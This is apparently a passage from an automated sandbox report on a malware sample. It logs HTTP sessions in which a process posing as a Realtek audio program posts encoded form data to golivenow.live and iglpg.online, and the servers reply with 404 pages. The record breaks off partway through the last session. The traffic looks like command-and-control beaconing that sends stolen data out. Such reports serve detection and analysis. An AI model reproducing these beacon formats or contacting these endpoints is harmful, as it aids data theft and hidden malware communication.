                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.11.204975566.29.149.46807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:44.425600052 CET697OUTPOST /r2k9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.golivenow.live
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 223
                                                                                        Origin: http://www.golivenow.live
                                                                                        Referer: http://www.golivenow.live/r2k9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 51 46 68 38 47 59 50 31 44 47 57 50 65 64 6a 35 48 53 68 59 35 7a 4b 78 4f 70 72 54 45 2f 4d 50 42 61 50 5a 64 30 39 34 6f 65 79 42 57 34 30 30 67 69 51 4c 50 2b 57 43 37 4a 5a 6d 34 6d 42 35 75 4e 64 38 61 6c 68 71 63 51 35 7a 55 4c 74 42 66 6e 6d 71 61 32 79 4b 37 39 39 35 32 59 62 68 77 54 72 71 35 55 55 57 67 5a 71 58 48 5a 70 4f 34 6f 58 68 72 56 42 64 62 46 78 43 6e 35 71 50 61 67 76 75 6b 71 62 35 43 51 35 31 4c 65 4d 52 51 47 58 51 70 62 6f 57 44 68 74 53 71 49 56 75 4d 75 69 65 59 65 42 32 57 33 53 2b 63 3d
                                                                                        Data Ascii: wIXhAG=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdQFh8GYP1DGWPedj5HShY5zKxOprTE/MPBaPZd094oeyBW400giQLP+WC7JZm4mB5uNd8alhqcQ5zULtBfnmqa2yK79952YbhwTrq5UUWgZqXHZpO4oXhrVBdbFxCn5qPagvukqb5CQ51LeMRQGXQpboWDhtSqIVuMuieYeB2W3S+c=
                                                                                        Nov 27, 2024 11:29:44.610393047 CET637INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:44 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 493
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.11.204975666.29.149.46807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:47.128191948 CET2578OUTPOST /r2k9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.golivenow.live
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 7371
                                                                                        Origin: http://www.golivenow.live
                                                                                        Referer: http://www.golivenow.live/r2k9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 6f 46 68 4c 75 59 56 55 44 47 58 50 65 64 39 70 48 52 68 59 35 55 4b 77 6d 6c 72 54 49 46 4d 4d 35 61 4f 36 6c 30 73 36 41 65 39 42 57 34 70 6b 67 6e 4f 37 50 52 57 43 4b 41 5a 6d 49 6d 42 35 75 4e 64 2f 43 6c 31 76 38 51 2f 7a 55 4b 73 42 65 6d 69 71 61 65 79 4b 69 66 39 35 79 75 62 56 38 54 6f 4b 4a 55 57 6a 38 5a 33 6e 48 66 6e 75 35 74 58 67 58 4b 42 64 33 2f 78 43 36 63 71 4d 36 67 71 4b 46 6e 50 35 43 6d 74 33 62 53 4b 31 45 43 59 43 78 4f 77 57 2f 50 72 54 47 47 4b 61 49 68 75 65 64 66 47 54 4f 51 47 5a 4d 73 42 33 50 51 6a 56 2b 45 32 78 6c 52 43 47 43 45 4c 31 42 7a 70 2f 49 52 4b 77 50 56 64 4d 58 31 74 67 39 64 2f 4a 45 47 31 65 44 65 73 79 31 75 2f 76 6d 57 78 65 6e 72 78 64 6e 61 74 6e 6a 6d 47 77 73 4e 62 6d 68 77 76 4a 51 77 44 52 34 64 53 44 36 56 59 6f 47 39 58 36 63 30 6d 45 50 62 74 78 71 50 69 61 62 66 69 78 54 72 37 67 38 36 67 51 76 [TRUNCATED]
                                                                                        Data Ascii: wIXhAG=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdoFhLuYVUDGXPed9pHRhY5UKwmlrTIFMM5aO6l0s6Ae9BW4pkgnO7PRWCKAZmImB5uNd/Cl1v8Q/zUKsBemiqaeyKif95yubV8ToKJUWj8Z3nHfnu5tXgXKBd3/xC6cqM6gqKFnP5Cmt3bSK1ECYCxOwW/PrTGGKaIhuedfGTOQGZMsB3PQjV+E2xlRCGCEL1Bzp/IRKwPVdMX1tg9d/JEG1eDesy1u/vmWxenrxdnatnjmGwsNbmhwvJQwDR4dSD6VYoG9X6c0mEPbtxqPiabfixTr7g86gQvR0q/MGWDo4kOuvflGnog4LlkXE1eY2yQyBtT0vD1jUNRwK9hfmYpslbmtYaivwInOTvp7RikH+Ex4U6XGXb9bnHECog58YnJPnv7Mng2LPMDzfFvNUd8aTwUgMB3pHVzVrbXlnKU37bUz2PqtKYdiLzAvIB1k2dKJInCJh4WR+7z9uoSylc7Oo/I3mWkTC+INi9FT3gH8PSA92kb2mlBkTE+LeyGsB4LotZcL0zV53hsDzjCDEJMIqKdmrFyXg1AShA/1Xr+obAk8mqN2xtJ6aSwGFJ8vsaak6AmuaO6mZPRT+0TFc+a5JHdrWvOrO9FH6rfzgkyh9xJSuBBNCD4V46WzOX7LuX0tsUBlMvM2zUJVZAse4EON3v7L6ei5DFS6zalqb7xTiSuZSm+ohpUi6Na1dWi7DurkLDHanaqpzA9KXfI9+chrRJs6dhEniO3qbaqlhDCcEPvBXE2UInu/sQ42S/iQ+GBW/DDZjV8hy30HFextwIZtUbvCv6k+mzVp65es/npPsuViXINxrc+EoVZk87M65pxaYNbr++0Kp7pW/9mu0rcPQz1MV9y2N/f2KAEXIDKlsKwqmdAKrQM/6z7omVmoyEXQGH8WPWAX8VDg1yb0uTQspm3qcTPx8VAeVXa/4mKFXmS0rZl8uqFYxdXHPT8ub+G4n [TRUNCATED]
                                                                                        Nov 27, 2024 11:29:47.128262997 CET5268OUTData Raw: 43 30 6e 4e 44 53 38 33 37 7a 63 6d 39 61 79 4b 63 58 56 66 51 41 6d 62 71 74 75 51 65 65 78 4c 53 2b 4c 6a 39 35 67 4b 56 43 4b 78 41 31 41 4a 36 67 6b 65 59 35 54 74 31 59 42 65 6e 67 55 67 39 74 42 79 32 30 30 2b 45 50 55 4b 36 2f 63 44 4e 6b
                                                                                        Data Ascii: C0nNDS837zcm9ayKcXVfQAmbqtuQeexLS+Lj95gKVCKxA1AJ6gkeY5Tt1YBengUg9tBy200+EPUK6/cDNkcqAhfudP/At9FFuLSBe/EAuVF2uFpE8q4Y5pP+u3Piktt4hrYk3T/z8Vd+CHVn0W0UO4ZERlFVdBR00eGwARsxtX3QJ9Lh6Yt3VnHLSxbT9Xr4/zXajXumBmereJnjz5BCpiHDRh6sWNmgDpDlrRtllJ0t+oSxscn
                                                                                        Nov 27, 2024 11:29:47.315011978 CET637INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:47 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 493
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.11.204975766.29.149.46807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:49.829678059 CET411OUTGET /r2k9/?wIXhAG=R82aEe+RY/7ruopITyHmIZKE6mty2NjUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfWsMWJHlNdq0zf8f0Cc=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.golivenow.live
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:29:50.010843039 CET652INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:49 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 493
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.11.2049758173.201.189.241807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:55.379116058 CET671OUTPOST /rbqc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.iglpg.online
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 203
                                                                                        Origin: http://www.iglpg.online
                                                                                        Referer: http://www.iglpg.online/rbqc/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 30 6f 47 70 4c 71 45 4c 39 39 72 46 57 5a 67 6e 76 72 4e 44 51 77 79 72 56 30 69 4c 57 32 4a 79 57 53 63 45 56 71 41 73 77 6d 6c 2f 69 71 53 68 4d 49 79 69 57 73 34 35 63 56 74 45 59 55 73 67 43 49 31 77 52 6d 7a 6c 32 37 55 66 42 47 36 53 66 4e 64 37 51 4b 68 38 4c 67 46 33 6f 71 34 5a 79 54 37 52 44 49 64 6b 7a 65 6c 67 64 58 6d 77 6a 38 6d 4d 57 2b 79 48 47 50 56 68 2b 4f 38 37 44 54 75 67 30 6d 71 72 6f 6c 6e 51 48 74 2f 73 31 77 6e 4b 41 41 62 48 76 51 34 6e 31 58 63 59 35 32 71 73 56 58 4e 72 42 5a 71 54 33 46 78 4c 4c 36 46 5a 53 51 3d 3d
                                                                                        Data Ascii: wIXhAG=6MJTL6kNv0zH0oGpLqEL99rFWZgnvrNDQwyrV0iLW2JyWScEVqAswml/iqShMIyiWs45cVtEYUsgCI1wRmzl27UfBG6SfNd7QKh8LgF3oq4ZyT7RDIdkzelgdXmwj8mMW+yHGPVh+O87DTug0mqrolnQHt/s1wnKAAbHvQ4n1XcY52qsVXNrBZqT3FxLL6FZSQ==
                                                                                        Nov 27, 2024 11:29:55.729764938 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:55 GMT
                                                                                        Server: Apache
                                                                                        X-Powered-By: PHP/8.2.24
                                                                                        X-DNS-Prefetch-Control: on
                                                                                        X-LiteSpeed-Tag: 844_HTTP.404
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        Link: <https://iglpg.online/wp-json/>; rel="https://api.w.org/"
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: br
                                                                                        Content-Length: 8984
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 13 1d ae cc 48 4d ea 01 d0 0c 1c d7 63 9d f7 9f 96 da 17 93 49 f4 3e 54 fe 64 db 00 1a 40 a3 6f 93 be 34 f2 aa d6 1a 79 ae 43 cb 0f 36 d0 24 a4 be 06 68 1e 72 17 ab 36 4a f7 8e 36 48 36 75 94 ed df 9b 6a b6 0a 97 2b 87 10 8b d2 99 97 42 e7 90 62 29 be f0 ff 78 77 01 9c 17 20 79 06 14 66 48 89 e7 21 25 9e 87 bc 14 fe 7f 3f ec 12 00 75 e4 e5 10 4b 4f ef a2 8d b9 ec 20 b9 a1 ba bb ce ad 5b af 63 a2 26 73 ef ca 2b 7d 94 e2 dd 32 34 ed 49 b6 7d 23 83 43 83 61 09 84 70 db 37 91 35 65 c3 7d 6f c1 24 2d a5 7c f1 2e 6a 43 a6 7d 7e 2e cd 02 b2 0d d6 ab f5 31 02 1a eb 39 d6 00 49 07 5e a1 61 24 ef bf 47 80 a5 db 58 a1 7e 57 c0 7e 1c 07 09 fa 15 fb dd 40 5b 13 76 fe 6a 1f 08 fb 4c 8c ac fe 87 56 88 33 54 28 d1 44 31 53 09 81 4b a7 a9 98 b6 02 6d 00 03 42 88 01 06 56 3c 2f ac cf fd ae 6d bb 2b ac 5f fe e1 ed 17 e3 57 68 4f 8e 3d 21 b0 0f 18 d6 66 ff b2 24 78 69 05 30 95 75 db ca 76 c4 76 a3 b3 9d b7 95 54 8c 9b 02 22 b6 b3 4d 0b 78 fc ab 96 8a fa 7c c6 df bb c1 fd 38 ff d2 ec 17 f5 f5 7f be fe 47 0f ba f7 d0 9a [TRUNCATED]
                                                                                        Data Ascii: HMcI>Td@o4yC6$hr6J6H6uj+Bb)xw yfH!%?uKO [c&s+}24I}#Cap75e}o$-|.jC}~.19I^a$GX~W~@[vjLV3T(D1SKmBV</m+_WhO=!f$xi0uvvT"Mx|8GJum`0N{=dUI@nmI@nvY)\6IG607|ps=p9~5.'[yBnIO%.79+$FZ>hY2H5p[9/EFFoO0L-tBAmuR,<""*f]pVW/f )4|bh#]Lu`d;4!Ug:Vl@C#x_<;2E~~n;1^:([ZDUiq8d,6c_F:]NeZQo1FVwXfQ@(zo.Y 3XZ(!LI)r/_b=mVa]q{DC.U0"TsZ2
                                                                                        Nov 27, 2024 11:29:55.729849100 CET1289INData Raw: 10 de 01 62 e1 8d 9a 65 bd e4 8d d1 57 55 b2 9b a7 f1 05 55 69 b3 8f 0e 2a a6 44 0c 21 15 66 98 31 6e 0c 81 1c 5d 20 d2 58 3f be 1a a7 03 39 1f db 77 40 53 a6 93 61 57 23 17 32 7c 89 c5 51 b9 25 49 94 11 7b 22 25 f1 2a b8 59 3e 9c a0 74 1f aa 5a
                                                                                        Data Ascii: beWUUi*D!f1n] X?9w@SaW#2|Q%I{"%*Y>tZ1V7\R"W:Q>c'!_!M_2KKf.[$2bdf@,V "@L4L?;N[;I@4Qt50F )j9]^e;(Sza9b;H'S7-v
                                                                                        Nov 27, 2024 11:29:55.729872942 CET1289INData Raw: b6 7c 41 08 53 3f 0b fc 10 21 da b2 41 c8 f8 6a 79 c1 93 52 71 26 04 67 89 66 21 85 74 07 8c 34 c2 1e 3f 1a f7 4c e6 ed 13 e2 9d d0 96 58 a5 1d 66 ea d3 be 32 c6 60 81 4a 8c b3 e5 11 ff ea cd 09 41 87 d3 b4 93 bb b0 8f db a3 d5 c4 ab 61 49 d8 cb
                                                                                        Data Ascii: |AS?!AjyRq&gf!t4?LXf2`JAaIcP59OqH%bmv12XG&(7[#i7Tz1{k"9ZN=j*]V'oxMI'VrF/cZSKUW"'x
                                                                                        Nov 27, 2024 11:29:55.729964972 CET1289INData Raw: 0b be 43 9d 5f b8 24 c5 3c 3b 38 d5 5f 5a a8 e9 6c 15 8e 84 f7 1c 6c ce c4 29 33 cc c5 a1 50 e7 51 85 1f 39 2e 9a 92 32 d5 04 d0 d9 07 8e 30 17 39 8d 1b 46 32 cc 79 82 45 5c 83 a6 b5 03 7d b9 92 62 b1 c7 70 3b 2c 99 13 d7 84 33 2d 86 df 1e 13 bc
                                                                                        Data Ascii: C_$<;8_Zll)3PQ9.209F2yE\}bp;,3-O@QL&4<C[LP.bhC[r3u37f~vw>hB1[U@w<yo%}}sB+?"nCa|XbB
                                                                                        Nov 27, 2024 11:29:55.730106115 CET1289INData Raw: 21 d3 1d ab 89 3a c2 82 20 fd 80 1a d2 52 f3 5a c0 ea 49 fa b2 52 0c e7 20 fe dd 9c 46 51 34 e3 52 4c 38 0a b0 59 1c ed 10 ab 2b 5d 90 2a 4d 34 11 18 46 17 05 9b df 85 c5 5e ac 0a 34 c8 47 50 cb 61 4c a2 b0 f4 0b 2c 4a d7 d9 40 42 d7 6f 57 32 39
                                                                                        Data Ascii: !: RZIR FQ4RL8Y+]*M4F^4GPaL,J@BoW29n;=J0}xI(EPv]xON\O<\"v!;v3$bZGsT2 6H<Y&@A;JE1uU.Y16,m$7
                                                                                        Nov 27, 2024 11:29:55.730133057 CET1289INData Raw: f8 52 47 40 66 4f 54 f1 e5 b5 20 75 b1 31 35 58 7a 22 95 ee 3e e4 ce 6d 9e 06 c2 5b 8d ac b9 a6 a4 2b e2 1b 6d c7 9f be bf 65 f0 dd b2 3e e1 df ff 70 ad 65 ca b9 6d dc 50 d1 f6 1f b7 f3 9a 85 9b 43 11 b0 d9 eb 0d a6 64 2c 37 f9 72 2a b6 82 8c 10
                                                                                        Data Ascii: RG@fOT u15Xz">m[+me>pemPCd,7r*O#?O_vq5pbZ?>,yFVLR8g$~o?\.,wg!%BRKs;|ojc6<6V\)(UTvHXm?I=*
                                                                                        Nov 27, 2024 11:29:55.730154037 CET1289INData Raw: b1 1a 2b 04 65 4b e0 71 f2 bb ad b3 0e 5a cf 72 26 32 f8 9b b5 d9 a4 a3 29 ec f1 7e 30 1d 48 69 70 36 13 40 ab ef c8 06 8e 3a 21 cc e6 2b 24 32 98 8f 05 0f 40 64 eb be fb 20 05 d1 e7 35 90 27 f3 ac fb 53 e7 8b 00 79 c1 4b f6 cf d6 68 d6 ac 5f fb
                                                                                        Data Ascii: +eKqZr&2)~0Hip6@:!+$2@d 5'SyKh_Q1`yst~{DO$mX;[:rYSHJB)FBr@{y-ogsHyR#+s4]kjk@d(wJ.[k@dBEFA+44bIt&lppMvv
                                                                                        Nov 27, 2024 11:29:55.730170012 CET435INData Raw: e5 95 b2 12 a2 26 85 1c 9a fd e1 72 d5 e2 fa fe 0e 7f 69 f6 49 9c 15 6c 69 a8 b3 ab 88 2a 61 d4 ec 2c 7b 08 9b 42 b5 73 13 ac b5 8d 2e 0e 22 4e 53 f6 d0 19 97 37 c5 03 2f 18 8a 3c 92 46 94 a3 1d 31 f6 91 3c c6 a3 27 37 83 13 d4 43 b5 25 a6 d5 6c
                                                                                        Data Ascii: &riIli*a,{Bs."NS7/<F1<'7C%llc*%,Zte;IK@"6s#Pm@[HkF\X_TVsfM7@1V:nmhh85;|{/sF8)


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.11.2049759173.201.189.241807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:58.082005024 CET691OUTPOST /rbqc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.iglpg.online
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 223
                                                                                        Origin: http://www.iglpg.online
                                                                                        Referer: http://www.iglpg.online/rbqc/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 79 49 57 70 4d 4a 38 4c 38 64 72 43 53 70 67 6e 67 4c 4e 48 51 77 2b 72 56 32 4f 69 58 46 39 79 59 54 73 45 55 72 41 73 33 6d 6c 2f 74 36 53 6f 43 6f 79 39 57 73 45 4c 63 58 35 45 59 55 34 67 43 4a 46 77 52 33 7a 71 31 4c 56 35 4d 6d 36 55 42 39 64 37 51 4b 68 38 4c 67 52 5a 6f 71 41 5a 79 6a 4c 52 42 70 64 6e 2b 2b 6c 6a 4c 48 6d 77 6e 38 6d 49 57 2b 79 78 47 4e 68 59 2b 49 34 37 44 53 65 67 30 33 71 73 6d 6c 6d 56 61 39 2b 47 78 79 58 43 4d 55 76 4c 69 52 51 5a 37 55 35 73 38 67 6e 32 49 6c 35 50 43 4b 32 68 7a 31 49 6a 4a 34 45 43 50 65 4d 31 43 47 77 58 44 44 59 50 6a 6d 41 4d 74 49 6c 45 5a 46 77 3d
                                                                                        Data Ascii: wIXhAG=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXF9yYTsEUrAs3ml/t6SoCoy9WsELcX5EYU4gCJFwR3zq1LV5Mm6UB9d7QKh8LgRZoqAZyjLRBpdn++ljLHmwn8mIW+yxGNhY+I47DSeg03qsmlmVa9+GxyXCMUvLiRQZ7U5s8gn2Il5PCK2hz1IjJ4ECPeM1CGwXDDYPjmAMtIlEZFw=
                                                                                        Nov 27, 2024 11:29:58.448162079 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:58 GMT
                                                                                        Server: Apache
                                                                                        X-Powered-By: PHP/8.2.24
                                                                                        X-DNS-Prefetch-Control: on
                                                                                        X-LiteSpeed-Tag: 844_HTTP.404
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        Link: <https://iglpg.online/wp-json/>; rel="https://api.w.org/"
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: br
                                                                                        Content-Length: 8984
                                                                                        Content-Type: text/html; charset=UTF-8
